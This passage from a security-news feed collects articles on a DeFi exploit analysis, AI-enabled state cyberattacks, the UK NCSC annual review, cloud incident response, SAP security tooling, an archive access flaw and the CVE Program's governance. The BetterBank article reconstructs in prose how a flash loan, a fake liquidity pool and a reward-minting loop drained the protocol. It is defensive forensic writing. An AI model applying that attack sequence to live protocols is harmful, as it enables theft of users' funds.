idea that you don't have any expectation that your photograph won't be taken in public,” Parady said. “It's hard for me to believe that you don't have a privacy right not to have an algorithm basically track you everywhere that you go.” Suzanne Smalley is a reporter covering digital privacy, surveillance technologies and cybersecurity policy for The Record. She was previously a cybersecurity reporter at CyberScoop. Earlier in her career Suzanne covered the Boston Police Department for the Boston Globe and two presidential campaign cycles for Newsweek. She lives in Washington with her husband and three children.
therecord.mediaOct 27, 2025extracted
Deep analysis of the flaw in BetterBank reward logic
Executive summary From August 26 to 27, 2025, BetterBank, a decentralized finance (DeFi) protocol operating on the PulseChain network, fell victim to a sophisticated exploit involving liquidity manipulation and reward minting. The attack resulted in an initial loss of approximately $5 million in digital assets. Following on-chain negotiations, the attacker returned approximately $2.7 million in assets, mitigating the financial damage and leaving a net loss of around $1.4 million. The vulnerability stemmed from a fundamental flaw in the protocol’s bonus reward system, specifically in the swapExactTokensForFavorAndTrackBonus function. This function was designed to mint ESTEEM reward tokens whenever a swap resulted in FAVOR tokens, but critically, it lacked the necessary validation to ensure that the swap occurred within a legitimate, whitelisted liquidity pool. A prior security audit by Zokyo had identified and flagged this precise vulnerability. However, due to a documented communication breakdown and the vulnerability’s perceived low severity, the finding was downgraded, and the BetterBank development team did not fully implement the recommended patch. This incident is a pivotal case study demonstrating how design-level oversights, compounded by organizational inaction in response to security warnings, can lead to severe financial consequences in the high-stakes realm of blockchain technology. The exploit underscores the importance of thorough security audits, clear communication of findings, and multilayered security protocols to protect against increasingly sophisticated attack vectors. In this article, we will analyze the root cause, impact, and on-chain forensics of the helper contracts used in the attack. Incident overview Incident timeline The BetterBank exploit was the culmination of a series of events that began well before the attack itself. In July 2025, approximately one month prior to the incident, the BetterBank protocol underwent a security audit conducted by the firm Zokyo. The audit report, which was made public after the exploit, explicitly identified a critical vulnerability related to the protocol’s bonus system. Titled “A Malicious User Can Trade Bogus Tokens To Qualify For Bonus Favor Through The UniswapWrapper,” the finding was a direct warning about the exploit vector that would later be used. However, based on the documented proof of concept (PoC), which used test Ether, the severity of the vulnerability was downgraded to “Informational” and marked as “Resolved” in the report. The BetterBank team did not fully implement the patched code snippet. The attack occurred on August 26, 2025. In response, the BetterBank team drained all remaining FAVOR liquidity pools to protect the assets that had not yet been siphoned. The team also took the proactive step of announcing a 20% bounty for the attacker and attempted to negotiate the return of funds. Remarkably, these efforts were successful. On August 27, 2025, the attacker returned a significant portion of the stolen assets – 550 million DAI tokens. This partial recovery is not a common outcome in DeFi exploits. Financial impact This incident had a significant financial impact on the BetterBank protocol and its users. Approximately $5 million worth of assets was initially drained. The attack specifically targeted liquidity pools, allowing the perpetrator to siphon off a mix of stablecoins and native PulseChain assets. The drained assets included 891 million DAI tokens, 9.05 billion PLSX tokens, and 7.40 billion WPLS tokens. In a positive turn of events, the attacker returned approximately $2.7 million in assets, specifically 550 million DAI. These funds represented a significant portion of the initial losses, resulting in a final net loss of around $1.4 million. This figure speaks to the severity of the initial exploit and the effectiveness of the team’s recovery efforts. While data from various sources show minor fluctuations in reported values due to real-time token price volatility, they consistently point to these key figures. A detailed breakdown of the losses and recovery is provided in the following table: Protocol description and vulnerability analysis The BetterBank protocol is a decentralized lending platform on the PulseChain network. It incorporates a two-token system that incentivizes liquidity provision and engagement. The primary token is FAVOR, while the second, ESTEEM, acts as a bonus reward token. The protocol’s core mechanism for rewarding users was tied to providing liquidity for FAVOR on decentralized exchanges (DEXs). Specifically, a function was designed to mint and distribute ESTEEM tokens whenever a trade resulted in FAVOR as the output token. While seemingly straightforward, this incentive system contained a critical design flaw that an attacker would later exploit. The vulnerability was not a mere coding bug, but a fundamental architectural misstep. By tying rewards to a generic, unvalidated condition – the appearance of FAVOR in a swap’s output – the protocol created an exploitable surface. Essentially, this design choice trusted all external trading environments equally and failed to anticipate that a malicious actor could replicate a trusted environment for their own purposes. This is a common failure in tokenomics, where the focus on incentivization overlooks the necessary security and validation mechanisms that should accompany the design of such features. The technical root cause of the vulnerability was a fundamental logic flaw in one of BetterBank’s smart contracts. The vulnerability was centered on the swapExactTokensForFavorAndTrackBonus function. The purpose of this function was to track swaps and mint ESTEEM bonuses. However, its core logic was incomplete: it only verified that FAVOR was the output token from the swap and failed to validate the source of the swap itself. The contract did not check whether the transaction originated from a legitimate, whitelisted liquidity pool or a registered contract. This lack of validation created a loophole that allowed an attacker to trigger the bonus system at will by creating a fake trading environment. This primary vulnerability was compounded by a secondary flaw in the protocol’s tokenomics: the flawed design of convertible rewards. The ESTEEM tokens, minted as a bonus, could be converted back into FAVOR tokens. This created a self-sustaining feedback loop. An attacker could trigger the swapExactTokensForFavorAndTrackBonus function to mint ESTEEM, and then use those newly minted tokens to obtain more FAVOR. The FAVOR could then be used in subsequent swaps to mint even more ESTEEM rewards. This cyclical process enabled the attacker to generate an unlimited supply of tokens and drain the protocol’s real reserves. The synergistic combination of logic and design flaws created a high-impact attack vector that was difficult to contain once initiated. To sum it up, the BetterBank exploit was the result of a critical vulnerability in the bonus minting system that allowed attackers to create fake liquidity pairs and harvest an unlimited amount of ESTEEM token rewards. As mentioned above, the system couldn’t distinguish between legitimate and malicious liquidity pairs, creating an opportunity for attackers to generate illegitimate token pairs. The BetterBank system included protection measures against attacks capable of inflicting substantial financial damage – namely a sell tax. However, the threat actors were able to bypass this tax mechanism, which exacerbated the impact of the attack. Exploit breakdown The exploit targeted the bonus minting system of the favorPLS.sol contract, specifically the logBuy() function and related tax logic. The key vulnerable components are: File: favorPLS.sol Vulnerable function: logBuy(address user, uint256 amount) Supporting function: calculateFavorBonuses(uint256 amount) Tax logic: _transfer() function The logBuy function only checks if the caller is an approved buy wrapper; it doesn’t validate the legitimacy of the trading pair or liquidity source. The tax only applies to transfers to legitimate, whitelisted addresses that are marked as isMarketPair[recipient]. By definition, fake, unauthorized LPs are not included in this mapping, so they bypass the maximum 50% sell tax imposed by protocol owners. The uniswapWraper.sol contract contains the buy wrapper functions that call logBuy(). The system only checks if the pair is in allowedDirectPair mapping, but this can be manipulated by creating fake tokens and adding them to the mapping to get them approved. Step-by-step attack reconstruction The attack on BetterBank was not a single transaction, but rather a carefully orchestrated sequence of on-chain actions. The exploit began with the attacker acquiring the necessary capital through a flash loan. Flash loans are a feature of many DeFi protocols that allow a user to borrow large sums of assets without collateral, provided the loan is repaid within the same atomic transaction. The attacker used the loan to obtain a significant amount of assets, which were then used to manipulate the protocol’s liquidity pools. The attacker used the flash loan funds to target and drain the real DAI-PDAIF liquidity pool, a core part of the BetterBank protocol. This initial step was crucial because it weakened the protocol’s defenses and provided the attacker with a large volume of PDAIF tokens, which were central to the reward-minting scheme. After draining the real liquidity pool, the attacker moved to the next phase of the operation. They deployed a new, custom, and worthless ERC-20 token. Exploiting the permissionless nature of PulseX, the attacker then created a fake liquidity pool, pairing their newly created bogus token with PDAIF. This fake pool was key to the entire exploit. It enabled the attacker to control both sides of a trading pair and manipulate the price and liquidity to their advantage without affecting the broader market. One critical element that made this attack profitable was the protocol’s tax logic. BetterBank had implemented a system that levied high fees on bulk swaps to deter this type of high-volume trading. However, the tax only applied to “official” or whitelisted liquidity pairs. Since the attacker’s newly created pool was not on this list, they were able to conduct their trades without incurring any fees. This critical loophole ensured the attack’s profitability. After establishing the bogus token and fake liquidity pool, the attacker initiated the final and most devastating phase of the exploit: the reward minting loop. They executed a series of rapid swaps between their worthless token and PDAIF within their custom-created pool. Each swap triggered the vulnerable swapExactTokensForFavorAndTrackBonus function in the BetterBank contract. Because the function did not validate the pool, it minted a substantial bonus of ESTEEM tokens with each swap, despite the illegitimacy of the trading pair. Each swap triggers: swapExactTokensForFavorAndTrackBonus() logBuy() function call calculateFavorBonuses() execution ESTEEM token minting (44% bonus) fake LP sell tax bypass The newly minted ESTEEM tokens were then converted back into FAVOR tokens, which could be used to facilitate more swaps. This created a recursive loop that allowed the attacker to generate an immense artificial supply of rewards and drain the protocol’s real asset reserves. Using this method, the attacker extracted approximately 891 million DAI, 9.05 billion PLSX, and 7.40 billion WPLS, effectively destabilizing the entire protocol. The success of this multi-layered attack demonstrates how a single fundamental logic flaw, combined with a series of smaller design failures, can lead to a catastrophic outcome. Mitigation strategy This attack could have been averted if a number of security measures had been implemented. First, the liquidity pool should be verified during a swap. The LP pair and liquidity source must be valid. The sell tax should be applied to all transfers. To prevent large-scale one-time attacks, a daily limit should be introduced to stop users from conducting transactions totaling more than 10,000 ESTEEM tokens per day. On-chain forensics and fund tracing The on-chain trail left by the attacker provides a clear forensic record of the exploit. After draining the assets on PulseChain, the attacker swapped the stolen DAI, PLSX, and WPLS for more liquid, cross-chain assets. The perpetrator then bridged approximately $922,000 worth of ETH from the PulseChain network to the Ethereum mainnet. This was done using a secondary attacker address beginning with 0xf3BA…, which was likely created to hinder exposure of the primary exploitation address. The final step in the money laundering process was the use of a crypto mixer, such as Tornado Cash, to obscure the origin of the funds and make them untraceable. Tracing the flow of these funds was challenging because many public-facing block explorers for the PulseChain network were either inaccessible or lacked comprehensive data at the time of the incident. This highlights the practical difficulties associated with on-chain forensics, where the lack of a reliable, up-to-date block explorer can greatly hinder analysis. In these scenarios, it becomes critical to use open-source explorers like Blockscout, which are more resilient and transparent. The following table provides a clear reference for the key on-chain entities involved in the attack: We managed to get hold of the attacker’s helper contracts to deepen our investigation. Through comprehensive bytecode analysis and contract decompilation, we determined that the attack architecture was multilayered. The attack utilized a factory contract pattern (0x792CDc4adcF6b33880865a200319ecbc496e98f8) that contained 18,219 bytes of embedded bytecode that were dynamically deployed during execution. The embedded contract revealed three critical functions: two simple functions (0x51cff8d9 and 0x529d699e) for initialization and cleanup, and a highly complex flash loan callback function (0x920f5c84) with the signature executeOperation(address[],uint256[],uint256[],address,bytes), which matches standard DeFi flash loan protocols like Aave and dYdX. Analysis of the decompiled code revealed that the executeOperation function implements sophisticated parameter parsing for flash loan callbacks, dynamic contract deployment capabilities, and complex external contract interactions with the PulseX Router (0x165c3410fc91ef562c50559f7d2289febed552d9). The attack exploited three critical vulnerabilities in BetterBank’s protocol: unvalidated reward minting in the logBuy function that failed to verify legitimate trading pairs; a tax bypass mechanism in the _transfer function that only applied the 50% sell tax to addresses marked as market pairs; and oracle manipulation through fake trading volume. The attacker requested flash loans of 50M DAI and 7.14B PLP tokens, drained real DAI-PDAIF pools, and created fake PDAIF pools with minimal liquidity. They performed approximately 20 iterations of fake trading to trigger massive ESTEEM reward minting, converting the rewards into additional PDAIF tokens, before re-adding liquidity with intentional imbalances and extracting profits of approximately 891M DAI through arbitrage. PoC snippets To illustrate the vulnerabilities that made such an attack possible, we examined code snippets from Zokyo researchers. First, a fake liquidity pool pair is created with FAVOR and a fake token is generated by the attacker. By extension, the liquidity pool pairs with this token were also unsubstantiated. Next, the fake LP pair is approved in the allowedDirectPair mapping, allowing it to pass the system check and perform the bulk swap transactions. These steps enable exploit execution, completing FAVOR swaps and collecting ESTEEM bonuses. We also performed a single swap in a local environment to demonstrate the design flaw that allowed the attackers to perform transactions over and over again. Finally, several checks are performed to verify the exploit’s success. Conclusion The BetterBank exploit was a multifaceted attack that combined technical precision with detailed knowledge of the protocol’s design flaws. The root cause was a lack of validation in the reward-minting logic, which enabled an attacker to generate unlimited value from a counterfeit liquidity pool. This technical failure was compounded by an organizational breakdown whereby a critical vulnerability explicitly identified in a security audit was downgraded in severity and left unpatched. The incident serves as a powerful case study for developers, auditors, and investors. It demonstrates that ensuring the security of a decentralized protocol is a shared, ongoing responsibility. The vulnerability was not merely a coding error, but rather a design flaw that created an exploitable surface. The confusion and crisis communications that followed the exploit are a stark reminder of the consequences when communication breaks down between security professionals and protocol teams. While the return of a portion of the funds is a positive outcome, it does not overshadow the core lesson: in the world of decentralized finance, every line of code matters, every audit finding must be taken seriously, and every protocol must adopt a proactive, multilayered defense posture to safeguard against the persistent and evolving threats of the digital frontier.
securelist.comOct 22, 2025extracted
Microsoft: Russia, China Increasingly Using AI to Escalate Cyberattacks on the US
Russia, China, Iran and North Korea have sharply increased their use of artificial intelligence to deceive people online and mount cyberattacks against the United States, according to new research from Microsoft. This July, the company identified more than 200 instances of foreign adversaries using AI to create fake content online, more than double the number from July 2024 and more than ten times the number seen in 2023. The findings, published Thursday in Microsoft’s annual digital threats report, show how foreign adversaries are adopting new and innovative tactics in their efforts to weaponize the internet as a tool for espionage and deception. AI’s potential said to be exploited by US foes America’s adversaries, as well as criminal gangs and hacking companies, have exploited AI’s potential, using it to automate and improve cyberattacks, to spread inflammatory disinformation and to penetrate sensitive systems. AI can translate poorly worded phishing emails into fluent English, for example, as well as generate digital clones of senior government officials. Government cyber operations often aim to obtain classified information, undermine supply chains, disrupt critical public services or spread disinformation. Cyber criminals on the other hand work for profit by stealing corporate secrets or using ransomware to extort payments from their victims. These gangs are responsible for the wide majority of cyberattacks in the world and in some cases have built partnerships with countries like Russia. Increasingly, these attackers are using AI to target governments, businesses and critical systems like hospitals and transportation networks, according to Amy Hogan-Burney, Microsoft’s vice president for customer security and trust, who oversaw the report. Many U.S. companies and organizations, meanwhile, are getting by with outdated cyber defenses, even as Americans expand their networks with new digital connections. Companies, governments, organizations and individuals must take the threat seriously if they are to protect themselves amid escalating digital threats, she said. “We see this as a pivotal moment where innovation is going so fast,” Hogan-Burney said. “This is the year when you absolutely must invest in your cybersecurity basics.” US is a popular target The U.S. is the top target for cyberattacks, with criminals and foreign adversaries targeting companies, governments and organizations in the U.S. more than any other country. Israel and Ukraine were the second and third most popular targets, showing how military conflicts involving those two nations have spilled over into the digital realm. Russia, China and Iran have denied that they use cyber operations for espionage, disruption and disinformation. China, for instance, says the U.S. is trying to “ smear ” Beijing while conducting its own cyberattacks. In a statement emailed to The Associated Press on Thursday, Iran’s mission to the United Nations said Iran rejects allegations that it is responsible for cyberattacks on the U.S. while reserving the right to defend itself.
securityweek.comOct 17, 2025extracted
UK hit by record number of ‘nationally significant’ cyberattacks
UK hit by record number of ‘nationally significant’ cyberattacks A record number of “nationally significant” cyberattacks hit the United Kingdom last year, the National Cyber Security Centre (NCSC) is to announce on Tuesday as it publishes its annual review for 2024. The cyber agency will reveal its staff were scrambled to assist with the response to 429 attacks between the beginning of September 2024 and the end of August this year. Of these, 204 were considered “nationally significant” — more than double the 89 in that category handled in the twelve months prior. Of these 204 incidents, 18 were categorized as “highly significant” which is the second-most severe rating in the agency’s categorization scale, just behind a national cyber emergency. These 18 attacks had “a serious impact on central government, UK essential services, a large proportion of the UK population, or the UK economy.” In response to this rise, the British government is also announcing on Tuesday it will be writing to the chief executives and chairs of the country's leading businesses to “take concrete actions” to protect their enterprises from attacks. In the wake of the month-plus disruption to Jaguar Land Rover (JLR), the letter alerts industry that hostile cyber activity targeting British businesses has become “more intense, frequent and sophisticated.” The attack against JLR was described as “more than a company outage” but “an economic security incident” by Lucas Kello, the director of the University of Oxford's Academic Centre of Excellence in Cyber Security Research. “If disruption drags on for weeks or months, it imperils the government’s central growth mission. How can Britain achieve ‘the highest sustained growth in the G7’ if its top exporting sector stalls?” The NCSC’s Annual Review has been drafted to specifically reference this threat, with a subheading calling for the country to “open your eyes to imminent risk to your economic security.” In his foreword to the review, the security minister Dan Jarvis will warn that “cybersecurity has never been more pivotal to our national security and our economic health.” After delivering a speech at the NCSC’s annual review event, Jarvis is set to have a meeting with representatives from FTSE 350 companies to stress the need for them to make cyber resilience a board-level responsibility. “While we work round the clock to counter threats and provide support to businesses of all sizes — we cannot do it alone,” he will say, according to prepared remarks. “We’re working with business leaders to ensure they recognise the scale of the threat and make cyber security a top priority.” Richard Horne, the NCSC’s chief executive, will warn: “Cyber security is now a matter of business survival and national resilience. With over half the incidents handled by the NCSC deemed to be nationally significant, and a 50% rise in highly significant attacks on last year, our collective exposure to serious impacts is growing at an alarming pace. “The best way to defend against these attacks is for organisations to make themselves as hard a target as possible. That demands urgency from every business leader: hesitation is a vulnerability, and the future of their business depends on the action they take today. The time to act is now.” Alexander Martin is the UK Editor for Recorded Future News. He was previously a technology reporter for Sky News and a fellow at the European Cyber Conflict Research Initiative, now Virtual Routes. He can be reached securely using Signal on: AlexanderMartin.79
therecord.mediaOct 14, 2025extracted
Responding to Cloud Incidents A Step-by-Step Guide from the 2025 Unit 42 Global Incident Response Report
Cloud incidents like ransomware attacks and account compromise can bring operations to a halt and create a situation in which costs, reputation and customer trust are at stake. What happens when your cloud environment falls under attack? How do you mitigate organizational impact step by step? Unit 42 helps cybersecurity pros understand how cloud investigations differ from traditional incidents, and what matters most when time is critical. According to the Unit 42 2025 Global Incident Response Report, 29% of incident investigations conducted in 2024 involved cloud or SaaS environments. One in five incidents involved threat actors adversely impacting cloud environments and assets. With entire business models relying on cloud-native architecture, it is vital to protect cloud surfaces. Traditional incident investigations focus heavily on endpoints and network activity, so cloud investigations require a mindset shift. When cloud environments are breached, investigations primarily focus on investigating identities, misconfigurations and service interactions. Unit 42 Cloud Incident Response begins each investigation by asking several questions: What is the overall impact? What logs do we have or lack? Are identity/service misuse, automated actions or API exploitation contributing factors? We’ll now go through the process, step by step. Cloud investigations begin with triage and scoping. Investigators will do two things: Establish a timeline. When did the abnormal activity begin? How was it detected? Is it ongoing? Determine what cloud assets are involved. Does the incident involve virtual machines? What about identity and access management (IAM), cloud storage, containers, etc.? Log gaps can be a major challenge due to misconfigurations or retention issues. Incident responders often uncover these problems during an engagement, which can be too late and obfuscate threat actor activity. Tip: Before any incidents occur, ensure you’ll have the data to investigate breaches properly: Enable logging within the CSP and retain the data for a minimum of 90 days. Enable additional logs specifically for tracking activity against your most sensitive resources. Ensure these logs are properly stored and encrypted to prevent any data loss if they are accessed by unauthorized parties. Centralize logs and apply machine learning and AI to correlate alerts. Once the incident has been triaged, evidence collection begins for investigators: Collect audit logs, resource-specific logs and snapshots. - These can provide details on what resources the attacker can access. Work with teams to capture volatile artifacts before they disappear. - Cloud environments are fast-moving and ephemeral, so anything that could assist the investigation needs to specifically be saved. Image cloud virtual machines (VMs) or containers. - These images involve taking snapshots of virtual machines and their attached volumes. This evidence enables understanding the attack and speedy remediation. “In one investigation, the organization successfully mitigated an attack, only to be compromised again a short time later. Our investigators discovered that threat actors had automated exploitation of a vulnerability within a service used within the organization’s cloud-based products. By combining this with using anti-forensic techniques to hide activity, the threat actor was able to regain access to the organization and its clients even after internal teams appeared to have successfully removed them.” –2025 Unit 42 Global Incident Response Report, page 12 The majority of cloud breaches begin with compromised and overpermissioned identities. Bad actors gaining access to one admin-level account could wipe out business data or infrastructure. They could even provide themselves more SSH certificates or keys to enable attack persistence. Attackers often use legitimate credentials. Behavioral baselining and anomaly detection via user and entity behavior analytics (UEBA) or Cortex XSIAM® is key. During this step, the Unit 42 team will investigate: IAM configurations Assume-role patterns Federated login logs Privilege escalation attempts One red flag investigators search for is excessive or unexpected identity hopping. Tracing how permissions are passed between identities, services or accounts is challenging but important. Cloud environments are often interconnected with the same set of credentials, depending on the architecture. Once inside, cloud-native lateral movement might involve attackers moving across regions, services or identities. Resource sprawl, the third-party ecosystem, as well as other factors can make these advancements difficult to detect. Living-off-the-land (LotL) and modify-the-land (MtL) techniques also help them evade detection, because they abuse existing resources rather than import new, malicious ones (like malware). To detect these attacks, teams must detect anomalies, not just signatures. That requires establishing a baseline of behavior. Once a baseline is achieved, you can flag unusual API calls, new role assumptions or atypical access patterns that are beyond failed logins. This step of a cloud incident investigation can be broken down into three parts: Containment needs to be fast and surgical to avoid alerting the attacker or impacting production/operations. Investigators will revoke credentials, restrict IAM permissions and quarantine virtual machines, preferably all at once. All possible sources of attacker persistence identified above need to be blocked. Eradication includes identifying persistence mechanisms, validating configuration changes and revoking tokens or rotating credentials. Recovery involves validating the integrity of cloud services, along with patching and monitoring exploited attack vectors. For faster incident containment and recovery, Unit 42 has several recommendations: Enable and centralize logs. Define various cloud IR playbooks. Prepare cloud sandboxes for forensics. Ensure the tools to gather images and logs are set up along with your cloud environment, so you always have the evidence needed to investigate the cause of a breach. Understand the roles and identities involved, look for signs of attacker persistence and then contain and eradicate the intrusion. Once the attack is stopped, your security experts should analyze the data to identify the attack vector and close it. Institutionalize lessons learned from previous incidents. As cloud adoption increases so will cloud-native attacks. Unit 42 can help you take a proactive stance against cloud attacks. Our approach identifies root causes and uses lessons learned, so clients increase their resiliency. Gain visibility: Get a complete picture of where your organization stands with our Unit 42 Cloud Security Assessment, which includes an analysis of cloud threat trends and adversaries related to your business and technology. Adopt zero trust: Taking incremental steps toward zero trust is pivotal to shrinking your cloud’s attack surface. Our Unit 42 Zero Trust Advisory helps you see where you stand today and helps you adopt a modern cybersecurity approach that eliminates implicit trust. Get elite backup: With a Unit 42 Retainer, our experts become an extension of your team. We’ll be on speed dial in case of an incident, and we’ll help you achieve a proactive stance against tomorrow’s threats. Ready to fortify your cloud defenses? Read the 2025 Global Incident Response Report for key insights from 500+ Unit 42 IR cases last year to help you better navigate the changing threat landscape. Cloud incidents are increasing and require a shift in investigation mindset: Cloud and SaaS environments are increasingly targeted in incident investigations (29% in 2024), necessitating a focus on identities, misconfigurations and service interactions rather than traditional endpoints and network activity. Proactive logging and evidence collection are crucial: To effectively respond to cloud incidents, organizations must enable and centralize logs, retain data for a minimum of 90 days, and collect volatile artifacts and virtual machine images promptly. Log gaps due to misconfigurations or retention issues can significantly hinder investigations. Identity and lateral movement are key areas of focus for attackers: The majority of cloud breaches begin with compromised identities. Attackers often use legitimate credentials and employ "living-off-the-land" and "modify-the-land" techniques to move laterally and maintain persistence. Detecting these attacks requires behavioral baselining and anomaly detection.
unit42.paloaltonetworks.comOct 7, 2025extracted
Onapsis enhances SAP security with latest platform updates
Onapsis enhances SAP security with latest platform updates Onapsis announced updates to its Onapsis Platform, including the launch of three new capabilities: the SAP Notes Command Center, Rapid Controls for Dangerous Exploits, and Alert on Anything for SAP Business Technology Platform (BTP). Together, these enhancements provide organizations with insights, visibility, and automation to strengthen their SAP application security posture. “This is a pivotal time in SAP security. Organizations no longer have the time to spend sorting through false positives or wondering if a patch is applied correctly; instead, they need security solutions that are customizable to their business and attack surface,” said Mariano Nunez, CEO of Onapsis. “The new capabilities in our Assess and Defend products, as well as the expansion of our platform, provide our customers with the technologies they need to keep ahead of sophisticated threat actors, protect their most valuable data, and achieve business resilience.” The exploitation of SAP applications is a top concern for organizations, as this year the industry is experiencing a record number of attacks targeting business-critical applications, leaving thousands of enterprises compromised. To help ensure companies are prepared and protected, Onapsis is delivering new updates that proactively discover threat activity with enhanced exploit detection rules and streamline all SAP security measures with task prioritization and patch validation. These updates include: SAP notes command center in assess: Empowers users to easily anticipate SAP patch days and prioritize tasks while also providing additional insights into SAP Note applications. This new dashboard eliminates the time spent on false positives, reduces the risk of undetected vulnerabilities and automatically validates that all patches, including manual configurations and workarounds, were applied correctly. Rapid controls: Leverages Defend’s unque exploit detection rules to monitor for threat activity targeting the most dangerous SAP vulnerabilities. These controls proactively address the risk of critical vulnerabilities and support regulatory requirements, such as EU NIS2 and US SEC rules. Alert on anything for SAP BTP: Enables organizations to customize and expand their BTP threat monitoring, providing users with the flexibility needed to manage security controls tailored to individual use cases Expanded coverage analysis in Onapsis security advisor: Automatically identifies assets in a customer’s security landscape that are not being actively monitored for threats, expanding their visibility to detect and act on any potential unmonitored critical systems in their SAP business landscapes “With the launch of these new enhancements, organizations are able to take control of their SAP security by proactively addressing any vulnerabilities and automatically identifying assets that aren’t protected in their security landscape but could weaken or cause disruption to their SAP applications,” said Sadik Al-Abdulla, CPO at Onapsis.
helpnetsecurity.comSep 25, 2025extracted
American Archive of Public Broadcasting allowed access to restricted media for years
A security flaw in the American Archive of Public Broadcasting (AAPB) website allowed unauthorized access to protected and private media, according to BleepingComputer. The American Archive of Public Broadcasting (AAPB) is a collaborative initiative between the Library of Congress and WGBH Educational Foundation, aimed at digitally preserving historically significant public radio and television programs from the past seven decades. The archives encompass a wide array of materials: news and public affairs programs, local history productions, educational content, science, music, art, literature, environmental programming, and raw interviews from landmark documentaries. The digitized content contains millions of items, including unique, sometimes sensitive material documenting pivotal events, regional culture, and documentary evidence of America’s civil and artistic history. Access without proper controls could facilitate copyright violations or the misuse of material critical for scholarship, public education, and future generations. And that’s what the discovered vulnerability provided. Not only did this vulnerability go unnoticed for years, the researcher who discovered the hole found that active exploitation started as early as at least 2021, even after a previous report by the same researcher to AAPB. But when BleepingComputer reached out, AAPB managed to implement a fix within 48 hours. And the researcher was able to confirm it worked. AAPB’s Communications Manager, Emily Balk told BleepingComputer: “We’re committed to protecting and preserving the archival material in the AAPB and have strengthened security for the archive.” On Discord the exploit method began circulating halfway through 2024, but even before that exploit, a simple script allowed users to request media files by ID and bypass AAPB’s access controls. This method worked even if the requested media files fell into protected or private categories. As long as the request had a valid media ID, it was possible to download the content. Apparently there are data-hoarder communities that do not care about copyright, which abused and shared the method for many years. The main impact was the unauthorized access and sharing of archival media, some of which was not intended for public release. This is an institutional and copyright issue. However, users should: Avoid sharing or downloading protected or leaked content, as you could be in a legal gray area. Be wary of unofficial sources circulating rare or unpublished public broadcasting material. Anticipate there might be phishing emails coming based on this breach. As with other news events, phishers will use them as clickbait. Let’s face it, an incognito window can only do so much. Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft Protection monitors for all of it, alerts you fast, and comes with identity theft insurance.
malwarebytes.comSep 23, 2025extracted
Future of CVE Program in limbo as CISA, board members debate path forward
Future of CVE Program in limbo as CISA, board members debate path forward The future of the central repository for security vulnerabilities is being hotly debated as multiple entities seek to support the effort or create alternatives following a funding incident earlier this year that nearly shuttered the database’s website. Last week, the Cybersecurity and Infrastructure Security Agency (CISA) released two documents explaining their plans for the CVE Program — a critical cybersecurity resource used globally to catalog thousands of software and hardware bugs. The CISA documents last week appeared to assert control over the CVE Program after subcontractor MITRE Corporation warned in April that the U.S. government may not renew a contract that funded the CVE.org website and about a dozen analysts who work to support the CVE Program. Although the Trump administration enacted a last minute 11-month contract extension, the incident prompted board members of the CVE Program to kickstart their own organization — called the CVE Foundation — and outline their own vision for the effort that would be run with CISA as one of several contributing entities. Nick Andersen, executive assistant director for cybersecurity at CISA, shot down any notion of CISA not having a lead role in the CVE Program last week, writing that the “mandate, mission, and momentum to lead this program into the future belongs to this agency.” “CISA is accountable to the American people to protect the nation’s critical infrastructure to ensure long-term continuity and mission focus. Suggestions to privatize the CVE Program or move to another alternative stewardship model might sound appealing, but the implications are serious,” he said. “Private entities, even with the best intentions, face conflicts of interest, prioritizing shareholder value over national security.” Multiple CVE Program board members, who spoke to Recorded Future News on condition of anonymity to speak freely about the situation, disputed CISA’s assessment and said the program would function best as a globally-supported collaborative effort. They also argued that CISA was never the program’s steward or leading contributor as claimed. Board members reiterated that the CVE Program is incredibly important to governments and organizations outside of the U.S. — with several countries recently passing legislation making the CVE system pivotal to national defense. They said the U.S. government should continue to back the program but in a support role alongside the public and private sector. ‘Conflict-free and vendor neutral’ On September 10, CISA published a two-page planning document about the CVE Program alongside Andersen’s statement that made general comments about the initiative’s need to evolve and “transition into a new era focused above all on trust, responsiveness, and vulnerability data quality.” The document says the CVE Program must be led “with commitment to conflict-free and vendor neutral stewardship, broad multi-sector engagement, transparent processes, and accountable leadership.” CISA said the roadmap was informed by feedback the agency received from domestic and international partners. The agency said it plans to expand the community of partnerships involved in the CVE Program, find “potential mechanisms for diversified funding,” implement technological improvements to the platform, improve the quality of CVE records and incorporate community feedback into program roadmap decisions. Andersen said the roadmap represents CISA “reaffirming” its leadership role and “seizing the opportunity to modernize the CVE Program.” CISA officials echoed Andersen, arguing in the document that privatizing the CVE Program “would dilute its value as a public good.” “The incentive structure in the software industry creates tension for private industry, who often face a difficult choice: promote transparency to downstream users through vulnerability disclosure or minimize the disclosure of vulnerabilities to avoid potential economic or reputational harm,” CISA explained. The conflicts of interest “reinforce the need for CISA to take a more active role in the long-term stewardship of the CVE Program,” the document claims. CISA went on to say it has “the appropriate mandate, relationships, and capability” as the U.S. agency in charge of cybersecurity, adding that it should be run “as a public good with global participation in its governance.” Andersen added that “fragmentation, privatization, or industry capture of this function would not only erode trust in the system — it would put American lives and infrastructure at risk.” CVE Foundation responds The CVE Foundation, created by board members in response to the April funding incident, claimed CISA’s document supported their vision “for a more transparent, globally supported, efficient, high quality CVE program.” In a comment under CISA’s link to the document on LinkedIn, the foundation said the roadmap shows the two entities have “compatible goals.” “We agree that a transparently operated 501(c)(3) nonprofit charity is the appropriate model to ensure the CVE Program can thrive and that CVE data remains free and openly accessible as a public good. We welcome working with CISA to achieve these goals,” the foundation wrote. Despite the public comments, multiple CVE Program board members privately disputed CISA’s assessment of the situation, questioning the U.S. government’s commitment to the program. Members of the board have requested financial transparency and the exact terms of the $57.8 million contract CISA has with The MITRE Corporation. MITRE is a respected cybersecurity organization that supports multiple U.S. agencies involved in defense, healthcare, aviation and more. It initially sounded the alarm in April about the expiration of its contract with CISA to help run the CVE Program and related initiatives like the Common Weakness Enumeration (CWE) Program. The board has not received any answer from the program sponsors about the contract, work items, payments and oversight for work completed. The board members said the U.S. government is one of the 470 contributors to the program and does not set the strategy or policy of the program. About 90% of the material in the CVE database comes through global, voluntary contributions from the authoritative sources of vulnerabilities. “The program partners participate and contribute voluntarily since they believe a clear and uniform numbering of security vulnerabilities helps keep their customers or constituents safe all across the globe,” they said. This year, the CVE Program expects to catalog more than 45,000 vulnerabilities. In the last six months, nearly 23,500 CVE records were added to the database. U.S. tax dollars were spent creating about 2,264 entries as of Sept 18, representing about 9.6% of the total, according to data provided by the CNA Scorecard site that tracks CVE statistics. Most of the tax dollars for the CVE Program went through the contract with MITRE and 146 CVE entries were contributed directly by CISA in the last six months. About 300 other organizations contributed CVE records in the last six months, including companies, vendors and government agencies in Japan, Germany, Spain, Singapore, India and more. CISA also adds missing details and other information to CVE records through its Vulnrichment project and the separate Known Exploited Vulnerabilities catalog. ‘Wider discussions’ Cybersecurity experts said the conversation around 